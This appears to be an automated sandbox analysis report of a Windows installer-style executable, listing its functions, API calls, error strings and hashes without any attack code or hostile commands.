                                                                                                                                                              Function 007C1175 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 53libraryloadermemoryCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • HeapSetInformation.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,?,?,007C111A,cabinet.dll,00000009,?,?,00000000), ref: 007C1186
                                                                                                                                                              • GetModuleHandleW.KERNEL32(kernel32,?,?,?,?,?,007C111A,cabinet.dll,00000009,?,?,00000000), ref: 007C1191
                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 007C119F
                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,007C111A,cabinet.dll,00000009,?,?,00000000), ref: 007C11BA
                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 007C11C2
                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,007C111A,cabinet.dll,00000009,?,?,00000000), ref: 007C11D7
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: AddressErrorLastProc$HandleHeapInformationModule
                                                                                                                                                              • String ID: SetDefaultDllDirectories$SetDllDirectoryW$kernel32
                                                                                                                                                              • API String ID: 3104334766-1824683568
                                                                                                                                                              • Opcode ID: e1c1df447bd253b4d77c95d7cd3d4fa530df67da478942a8a7343a531fae9e1e
                                                                                                                                                              • Instruction ID: 75117b2ad15c25deb94f0a2e76d2b54a5b42ca7aa0a06289393517848c76e194
                                                                                                                                                              • Opcode Fuzzy Hash: e1c1df447bd253b4d77c95d7cd3d4fa530df67da478942a8a7343a531fae9e1e
                                                                                                                                                              • Instruction Fuzzy Hash: 6B01B13120021ABBD7606BA69C49E6F7B5CFF42760B048029FE25D2241EB78DA01CBF0
                                                                                                                                                              Function 007DF639 Relevance: 15.2, APIs: 2, Strings: 8, Instructions: 155COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • EnterCriticalSection.KERNEL32(?), ref: 007DF64E
                                                                                                                                                              • LeaveCriticalSection.KERNEL32(?), ref: 007DF7C9
                                                                                                                                                              Strings
                                                                                                                                                              • UX denied while trying to set download URL on embedded payload: %ls, xrefs: 007DF6B9
                                                                                                                                                              • UX requested unknown container with id: %ls, xrefs: 007DF6F3
                                                                                                                                                              • UX did not provide container or payload id., xrefs: 007DF7B8
                                                                                                                                                              • Failed to set download password., xrefs: 007DF777
                                                                                                                                                              • Failed to set download URL., xrefs: 007DF728
                                                                                                                                                              • Engine is active, cannot change engine state., xrefs: 007DF668
                                                                                                                                                              • UX requested unknown payload with id: %ls, xrefs: 007DF6A3
                                                                                                                                                              • Failed to set download user., xrefs: 007DF751
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CriticalSection$EnterLeave
                                                                                                                                                              • String ID: Engine is active, cannot change engine state.$Failed to set download URL.$Failed to set download password.$Failed to set download user.$UX denied while trying to set download URL on embedded payload: %ls$UX did not provide container or payload id.$UX requested unknown container with id: %ls$UX requested unknown payload with id: %ls
                                                                                                                                                              • API String ID: 3168844106-2615595102
                                                                                                                                                              • Opcode ID: 2cfb1d6744e3c6f75e11d9f6781e91b6f27e1c3ec5f57abae3a04f861ea0eee6
                                                                                                                                                              • Instruction ID: 65924e20bac28d376b97cafbb15c2146dc18c600015b5dda3ca57b67f5822de0
                                                                                                                                                              • Opcode Fuzzy Hash: 2cfb1d6744e3c6f75e11d9f6781e91b6f27e1c3ec5f57abae3a04f861ea0eee6
                                                                                                                                                              • Instruction Fuzzy Hash: A941B472501611EBCB219E24CC45FAAB7B8FF10730B55412BE816EB390EB7DDD508B91
                                                                                                                                                              Function 00805A5E Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 196filememoryCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • CreateFileW.KERNEL32(000000FF,C0000000,00000004,00000000,00000004,00000080,00000000,00000000,00000000,00000000,00000078,00000410,000000FF,?,00000000,00000000), ref: 00805A9B
                                                                                                                                                              • GetLastError.KERNEL32 ref: 00805AA9
                                                                                                                                                              • VirtualAlloc.KERNEL32(00000000,00010000,00003000,00000004), ref: 00805AEA
                                                                                                                                                              • GetLastError.KERNEL32 ref: 00805AF7
                                                                                                                                                              • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00805C6A
                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 00805C79
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ErrorLastVirtual$AllocCloseCreateFileFreeHandle
                                                                                                                                                              • String ID: GET$dlutil.cpp
                                                                                                                                                              • API String ID: 2028584396-3303425918
                                                                                                                                                              • Opcode ID: a36d75601f0e1a8d2ff24d4cd7e990f830a62dd862fce399fefb4e5fe8849d6b
                                                                                                                                                              • Instruction ID: fd448fbc4a0268f16108b560990fbf0b5ddf9e194217aff977b01cb439dfda2f
                                                                                                                                                              • Opcode Fuzzy Hash: a36d75601f0e1a8d2ff24d4cd7e990f830a62dd862fce399fefb4e5fe8849d6b
                                                                                                                                                              • Instruction Fuzzy Hash: D0613B72A0061AABDBA1CFA4CC45BAF7BB8FF48764F154119FD15F6280E77099409FA0
                                                                                                                                                              Function 007D0C50 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 183COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 007D1020: CompareStringW.KERNEL32(00000000,00000000,feclient.dll,000000FF,00000000,000000FF,00000000,00000000,?,?,007D0C6F,?,00000000,?,00000000,00000000), ref: 007D104F
                                                                                                                                                              • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,00000000,?,00000000,?,00000000,00000001,?,?,00000000,?,00000000), ref: 007D0DF3
                                                                                                                                                              • GetLastError.KERNEL32 ref: 007D0E00
                                                                                                                                                              Strings
                                                                                                                                                              • Failed to create syncpoint event., xrefs: 007D0E2E
                                                                                                                                                              • Failed to append rollback cache action., xrefs: 007D0CCF
                                                                                                                                                              • Failed to append package start action., xrefs: 007D0C95
                                                                                                                                                              • plan.cpp, xrefs: 007D0E24
                                                                                                                                                              • Failed to append payload cache action., xrefs: 007D0DAA
                                                                                                                                                              • Failed to append cache action., xrefs: 007D0D4A
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CompareCreateErrorEventLastString
                                                                                                                                                              • String ID: Failed to append cache action.$Failed to append package start action.$Failed to append payload cache action.$Failed to append rollback cache action.$Failed to create syncpoint event.$plan.cpp
                                                                                                                                                              • API String ID: 801187047-2489563283
                                                                                                                                                              • Opcode ID: f4bffbb51d0247d5e45393a0b605158645c43419fd5b59cbcabbed8e9bf5c5a6
                                                                                                                                                              • Instruction ID: 7776a1e50116831083cc152a307dda5c9da4f5629808f7df4ebd7e248d885e78
                                                                                                                                                              • Opcode Fuzzy Hash: f4bffbb51d0247d5e45393a0b605158645c43419fd5b59cbcabbed8e9bf5c5a6
                                                                                                                                                              • Instruction Fuzzy Hash: A2616175500605EFCB15DF58C980AAABBFAFF84310F21845BE9199B311EB35EE41DB90
                                                                                                                                                              Function 00806EFF Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 159COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • CompareStringW.KERNEL32(0000007F,00000000,74DEDFD0,000000FF,type,000000FF,?,74DEDFD0,74DEDFD0,74DEDFD0), ref: 00806F55
                                                                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 00806FA0
                                                                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 0080701C
                                                                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 00807068
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: String$Free$Compare
                                                                                                                                                              • String ID: `<u$type$url
                                                                                                                                                              • API String ID: 1324494773-1686489133
                                                                                                                                                              • Opcode ID: 835698cd3a3968bdf6962ac375629874304e56e310b37fcbd8b7a09fd4bc3b6c
                                                                                                                                                              • Instruction ID: ec9ac6aee68eddc6cd141e68c008f3366343bd5838c276d9b02d27c3a08559f0
                                                                                                                                                              • Opcode Fuzzy Hash: 835698cd3a3968bdf6962ac375629874304e56e310b37fcbd8b7a09fd4bc3b6c
                                                                                                                                                              • Instruction Fuzzy Hash: B2516F35D05219EFCB55DB94CC45EAEBBB8FF04711F1042A9E511EB2A0DB31AE10DB50
                                                                                                                                                              Function 007D05A2 Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 133registryCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000001,00000000,?,?,00020006,00000000,?,0080B500,00000000,?), ref: 007D06D3
                                                                                                                                                              • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000001,00000000,?,?,00020006,00000000,?,0080B500,00000000,?), ref: 007D06E2
                                                                                                                                                                • Part of subcall function 00800BE9: RegCreateKeyExW.ADVAPI32(00000001,00000000,00000000,00000000,00000000,00000001,00000000,?,00000000,00000001,?,?,007D061A,?,00000000,00020006), ref: 00800C0E
                                                                                                                                                              Strings
                                                                                                                                                              • Failed to delete registration key: %ls, xrefs: 007D0681
                                                                                                                                                              • %ls.RebootRequired, xrefs: 007D05F0
                                                                                                                                                              • Failed to update resume mode., xrefs: 007D06B7
                                                                                                                                                              • Failed to write volatile reboot required registry key., xrefs: 007D061E
                                                                                                                                                              • Failed to open registration key., xrefs: 007D071A
                                                                                                                                                              • crypt32.dll, xrefs: 007D05AC
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Close$Create
                                                                                                                                                              • String ID: %ls.RebootRequired$Failed to delete registration key: %ls$Failed to open registration key.$Failed to update resume mode.$Failed to write volatile reboot required registry key.$crypt32.dll
                                                                                                                                                              • API String ID: 359002179-3398658923
                                                                                                                                                              • Opcode ID: 7f89a8fb3b5d3806221442ab72b5a0290bd1b69bdbba8a102ff3e62e4b497136
                                                                                                                                                              • Instruction ID: 02f72da40fd8b4730792aa65bcd0368b3879cce78a9a0b607ed2e21e94b4cbda
                                                                                                                                                              • Opcode Fuzzy Hash: 7f89a8fb3b5d3806221442ab72b5a0290bd1b69bdbba8a102ff3e62e4b497136
                                                                                                                                                              • Instruction Fuzzy Hash: 8D418131900608FBDF22AE60DC0AFAF7BBAFF80310F14441AF515A1261D779DA60DB91
                                                                                                                                                              Function 007DD24B Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 118threadCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,007DAD40,?,00000000,00000000), ref: 007DD2E9
                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?), ref: 007DD2F5
                                                                                                                                                                • Part of subcall function 007DCF25: WaitForSingleObject.KERNEL32(00000001,000493E0,00000000,?,?,007DD365,00000000,?,?,007DC7C9,00000001,?,?,?,?,?), ref: 007DCF37
                                                                                                                                                                • Part of subcall function 007DCF25: GetLastError.KERNEL32(?,?,007DD365,00000000,?,?,007DC7C9,00000001,?,?,?,?,?,00000000,00000000,?), ref: 007DCF41
                                                                                                                                                              • CloseHandle.KERNEL32(00000000,00000000,?,?,007DC7C9,00000001,?,?,?,?,?,00000000,00000000,?,?,?), ref: 007DD376
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ErrorLast$CloseCreateHandleObjectSingleThreadWait
                                                                                                                                                              • String ID: Failed to create elevated cache thread.$Failed to pump messages in child process.$QE|$elevation.cpp$fT|
                                                                                                                                                              • API String ID: 3606931770-3326198951
                                                                                                                                                              • Opcode ID: 0286acfecfe80cb4cfeffad581c89fc103714fced0c85b2789077bf21cbe2768
                                                                                                                                                              • Instruction ID: 1530c6ddeee3f4a013713a8f1de7e7d8e89f1b470a9f70fd96ec37271f664def
                                                                                                                                                              • Opcode Fuzzy Hash: 0286acfecfe80cb4cfeffad581c89fc103714fced0c85b2789077bf21cbe2768
                                                                                                                                                              • Instruction Fuzzy Hash: 1541F2B6D01219EBCB11DFA9D8859DEBBF8FF08310F10412AF918E7340E774A9008BA5
                                                                                                                                                              Function 007CF451 Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 109stringCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • _MREFOpen@16.MSPDB140-MSVCRT ref: 007CF48A
                                                                                                                                                                • Part of subcall function 007C4115: CreateDirectoryW.KERNELBASE(?,840F01E8,00000000,00000000,?,007DA0E8,00000000,00000000,?,00000000,007C53BD,00000000,?,?,007CD5B5,?), ref: 007C4123
                                                                                                                                                                • Part of subcall function 007C4115: GetLastError.KERNEL32(?,007DA0E8,00000000,00000000,?,00000000,007C53BD,00000000,?,?,007CD5B5,?,00000000,00000000), ref: 007C4131
                                                                                                                                                              • lstrlenA.KERNEL32(0080B500,00000000,00000094,00000000,00000094,?,?,007D04BF,swidtag,00000094,?,0080B518,007D04BF,00000000,?,00000000), ref: 007CF4DD
                                                                                                                                                                • Part of subcall function 00804DB3: CreateFileW.KERNEL32(0080B500,40000000,00000001,00000000,00000002,00000080,00000000,007D04BF,00000000,?,007CF4F4,?,00000080,0080B500,00000000), ref: 00804DCB
                                                                                                                                                                • Part of subcall function 00804DB3: GetLastError.KERNEL32(?,007CF4F4,?,00000080,0080B500,00000000,?,007D04BF,?,00000094,?,?,?,?,?,00000000), ref: 00804DD8
                                                                                                                                                              Strings
                                                                                                                                                              • Failed to allocate regid file path., xrefs: 007CF535
                                                                                                                                                              • Failed to format tag folder path., xrefs: 007CF543
                                                                                                                                                              • Failed to allocate regid folder path., xrefs: 007CF53C
                                                                                                                                                              • Failed to create regid folder: %ls, xrefs: 007CF525
                                                                                                                                                              • Failed to write tag xml to file: %ls, xrefs: 007CF51B
                                                                                                                                                              • swidtag, xrefs: 007CF49D
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CreateErrorLast$DirectoryFileOpen@16lstrlen
                                                                                                                                                              • String ID: Failed to allocate regid file path.$Failed to allocate regid folder path.$Failed to create regid folder: %ls$Failed to format tag folder path.$Failed to write tag xml to file: %ls$swidtag
                                                                                                                                                              • API String ID: 904508749-1201533908
                                                                                                                                                              • Opcode ID: e01748c847f7ef0f3e93b1fbc1c9bbcab7163aa5b6fda316fac108a344842432
                                                                                                                                                              • Instruction ID: 1e48e26fc87ad17b55fc560a1bbd1a4a5b3bed0a5b9bb69050945af0de4f2a51
                                                                                                                                                              • Opcode Fuzzy Hash: e01748c847f7ef0f3e93b1fbc1c9bbcab7163aa5b6fda316fac108a344842432
                                                                                                                                                              • Instruction Fuzzy Hash: A5317E31D00619FBCF11AE98DC46F9DBBB5FF04710F10416DFA10E6251D7799AA0AB90
                                                                                                                                                              Function 007D53E2 Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 91synchronizationCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • WaitForSingleObject.KERNEL32(?,0002BF20,?,F0000003,00000000,00000000,?,00000000,00000000,00000000,007C548E,00000000,00000000,?,00000000), ref: 007D548B
                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,007C4C61,?,?,00000000,?,?,?,?,?,?,0080B4A0,?,?), ref: 007D5496
                                                                                                                                                              Strings
                                                                                                                                                              • Failed to post terminate message to child process., xrefs: 007D5476
                                                                                                                                                              • Failed to write restart to message buffer., xrefs: 007D542E
                                                                                                                                                              • Failed to post terminate message to child process cache thread., xrefs: 007D545A
                                                                                                                                                              • pipe.cpp, xrefs: 007D54BA
                                                                                                                                                              • Failed to wait for child process exit., xrefs: 007D54C4
                                                                                                                                                              • Failed to write exit code to message buffer., xrefs: 007D5406
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ErrorLastObjectSingleWait
                                                                                                                                                              • String ID: Failed to post terminate message to child process cache thread.$Failed to post terminate message to child process.$Failed to wait for child process exit.$Failed to write exit code to message buffer.$Failed to write restart to message buffer.$pipe.cpp
                                                                                                                                                              • API String ID: 1211598281-2161881128
                                                                                                                                                              • Opcode ID: 9314483127c2f4ac897fff5bcbcb70e7a1d2c07c192ae37c0751d10274a6e27b
                                                                                                                                                              • Instruction ID: 5949b9e3b73585a40780ced0d8ef055ef14476fa1ef8423179ac322d2255c7dc
                                                                                                                                                              • Opcode Fuzzy Hash: 9314483127c2f4ac897fff5bcbcb70e7a1d2c07c192ae37c0751d10274a6e27b
                                                                                                                                                              • Instruction Fuzzy Hash: 8B21D572940A69BBDF225A94DC05EDE7778FF00771F204213F910B6390D738AD9096E1
                                                                                                                                                              Function 007D9098 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 89fileCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • CreateFileW.KERNEL32(00000000,80000000,00000005,00000000,00000003,08000000,00000000,00000000,00000101,?,007D9F04,00000003,000007D0,00000003,?,000007D0), ref: 007D90B2
                                                                                                                                                              • GetLastError.KERNEL32(?,007D9F04,00000003,000007D0,00000003,?,000007D0,00000000,000007D0,00000000,00000003,00000000,00000003,000007D0,00000001,?), ref: 007D90BF
                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,007D9F04,00000003,000007D0,00000003,?,000007D0,00000000,000007D0,00000000,00000003,00000000,00000003,000007D0,00000001), ref: 007D9187
                                                                                                                                                              Strings
                                                                                                                                                              • Failed to open payload at path: %ls, xrefs: 007D9103
                                                                                                                                                              • Failed to verify signature of payload: %ls, xrefs: 007D912F
                                                                                                                                                              • cache.cpp, xrefs: 007D90F6
                                                                                                                                                              • Failed to verify catalog signature of payload: %ls, xrefs: 007D914E
                                                                                                                                                              • Failed to verify hash of payload: %ls, xrefs: 007D9172
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CloseCreateErrorFileHandleLast
                                                                                                                                                              • String ID: Failed to open payload at path: %ls$Failed to verify catalog signature of payload: %ls$Failed to verify hash of payload: %ls$Failed to verify signature of payload: %ls$cache.cpp
                                                                                                                                                              • API String ID: 2528220319-2757871984
                                                                                                                                                              • Opcode ID: ab4b532a700d5fc68e469174463122959801e7111eb01075f5fee0387a81cbc4
                                                                                                                                                              • Instruction ID: 3951116777c512b455a25c583bca9711bf19b3ec1f7e674896a30a43483aa6db
                                                                                                                                                              • Opcode Fuzzy Hash: ab4b532a700d5fc68e469174463122959801e7111eb01075f5fee0387a81cbc4
                                                                                                                                                              • Instruction Fuzzy Hash: E721A33654062BB7CB321A688C4DF9ABA39FF00760F114317FE1466390937A9C61EAD6
                                                                                                                                                              Function 007C6B1E Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 88COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 007C6B69
                                                                                                                                                              • GetLastError.KERNEL32 ref: 007C6B73
                                                                                                                                                              • GetVolumePathNameW.KERNEL32(?,?,00000104), ref: 007C6BB7
                                                                                                                                                              • GetLastError.KERNEL32 ref: 007C6BC1
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ErrorLast$DirectoryNamePathVolumeWindows
                                                                                                                                                              • String ID: Failed to get volume path name.$Failed to get windows directory.$Failed to set variant value.$variable.cpp
                                                                                                                                                              • API String ID: 124030351-4026719079
                                                                                                                                                              • Opcode ID: 45f7d5d3980de63262ed00b9fec22d3daeb709fb39d4b3b8fdc98f3ac46602e8
                                                                                                                                                              • Instruction ID: af97686eba0589f3364b1b7e3d9c775fdaa0e0c5de962754e9c979f91f09a612
                                                                                                                                                              • Opcode Fuzzy Hash: 45f7d5d3980de63262ed00b9fec22d3daeb709fb39d4b3b8fdc98f3ac46602e8
                                                                                                                                                              • Instruction Fuzzy Hash: C621B7B3E41239A7D7309B558D4AF9B77ACAB44B20F11416DBD04F7281E63CAD4046F5
                                                                                                                                                              Function 007C9C6D Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 82COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • _MREFOpen@16.MSPDB140-MSVCRT ref: 007C9C88
                                                                                                                                                              • GetFileAttributesW.KERNEL32(00000000,000002C0,?,00000000,00000000,000002C0,00000100,00000000,000002C0,?,007CA895,00000100,000002C0,000002C0,?,000002C0), ref: 007C9CA0
                                                                                                                                                              • GetLastError.KERNEL32(?,007CA895,00000100,000002C0,000002C0,?,000002C0,00000100,000002C0,000002C0,00000100), ref: 007C9CAB
                                                                                                                                                              Strings
                                                                                                                                                              • File search: %ls, did not find path: %ls, xrefs: 007C9CFD
                                                                                                                                                              • Failed get to file attributes. '%ls', xrefs: 007C9CE8
